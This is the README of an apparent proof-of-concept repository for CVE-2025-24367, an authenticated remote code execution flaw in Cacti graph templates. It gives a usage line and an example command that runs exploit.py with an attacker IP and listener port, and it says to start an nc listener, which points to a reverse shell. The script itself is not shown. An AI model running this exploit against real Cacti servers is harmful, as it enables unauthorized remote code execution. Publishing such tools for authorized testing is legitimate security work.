Proof of Concept for CVE-2025-24367# CVE-2025-24367 - Cacti Authenticated Graph Template RCE
# Usage & Safety
> **Important — Read this first:**
> This repository and `exploit.py` are provided **for educational and research purposes only**. Do **not** use this code against systems, networks, or services for which you do not have **explicit, written authorization**. Unauthorized access to computer systems is illegal and unethical. By using this code you agree to follow applicable laws and institutional policies.
---
## Requirements
- Python 3.8+
```bash
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
```
---
## Usage
```text
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
```
### Example
Before running the script make sure you have a nc listener running. Run the script without proxy unless debugging:
```bash
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
```
---
## VERY IMPORTANT WARNINGS
- **Do not run this against production systems or any system you do not own or have explicit permission to test.**
- Always obtain **written authorization** before performing security testing.
- Use isolated lab environments (e.g., VMs, containers, or purpose-built test networks) for experimentation.
- Your organization may have reporting and disclosure policies — follow them.
- The authors accept no responsibility for misuse of this code.
**Final reminder:** This script and README are for **educational use only**. Never use these tools to access systems unlawfully.
[4.0K] /data/pocs/92cbbde36402f290f268b52109a526ab51b5a843
├── [8.3K] exploit.py
└── [1.6K] README.md
1 directory, 2 files